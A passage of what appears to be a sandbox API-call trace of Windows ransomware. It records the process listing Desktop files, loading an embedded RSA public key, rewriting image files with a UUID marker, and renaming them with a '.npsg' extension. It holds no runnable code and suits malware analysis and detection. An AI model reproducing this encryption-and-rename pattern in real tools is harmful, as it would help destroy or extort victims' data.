out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85ec24b0, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x7c4871e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e4, ftLastWriteTime.dwLowDateTime=0x7c4871e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gDzXHkl4U_l2Ylj0rT", cAlternateFileName="GDZXHK~1")) returned 1 [0236.171] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf34efcc0, ftCreationTime.dwHighDateTime=0x1d5bb77, ftLastAccessTime.dwLowDateTime=0x1d270910, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x1d270910, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0xdaca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GpxN6i4pZTwUlSXO-f.gif", cAlternateFileName="GPXN6I~1.GIF")) returned 1 [0236.171] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GpxN6i4pZTwUlSXO-f.gif") returned=".gif" [0236.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GpxN6i4pZTwUlSXO-f.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gpxn6i4pztwulsxo-f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.214] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=56010) returned 1 [0236.214] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.217] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xdaa4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.217] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.218] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xdaca, lpOverlapped=0x0) returned 1 [0236.219] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.219] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.219] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.219] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.220] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.220] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.220] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.220] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.220] GetLastError () returned 0x0 [0236.220] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.220] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.221] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.221] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.221] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.221] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x346fd28 [0236.222] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xdaca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.222] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.222] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.222] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.222] CloseHandle (hObject=0x644) returned 1 [0236.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b8f7a8 [0236.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0236.224] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GpxN6i4pZTwUlSXO-f.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gpxn6i4pztwulsxo-f.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GpxN6i4pZTwUlSXO-f.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gpxn6i4pztwulsxo-f.gif.npsg")) returned 1 [0236.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.226] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.227] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb586e900, ftCreationTime.dwHighDateTime=0x1d5baa7, ftLastAccessTime.dwLowDateTime=0xdd2e3c40, ftLastAccessTime.dwHighDateTime=0x1d5bf63, ftLastWriteTime.dwLowDateTime=0xdd2e3c40, ftLastWriteTime.dwHighDateTime=0x1d5bf63, nFileSizeHigh=0x0, nFileSizeLow=0x2bb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hDFbsew2.jpg", cAlternateFileName="")) returned 1 [0236.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.228] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hDFbsew2.jpg") returned=".jpg" [0236.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hDFbsew2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hdfbsew2.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.228] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=11186) returned 1 [0236.228] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.231] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2b8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.231] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.232] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.232] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2bb2, lpOverlapped=0x0) returned 1 [0236.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.232] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.233] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.233] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.233] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.233] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.234] GetLastError () returned 0x0 [0236.235] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.235] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.235] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.235] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.235] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2bb0) returned 0x3b7fcd0 [0236.235] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94fa8 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400020 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94ff0 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400080 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.236] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400080 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400068 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.237] GetCurrentThreadId () returned 0x5b4 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x6883f0 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.238] GetCurrentThreadId () returned 0x5b4 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400080 [0236.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400050 [0236.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000e0 [0236.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000b0 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400098 [0236.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000f8 [0236.240] HeapFree (in: hHeap=0x620000, 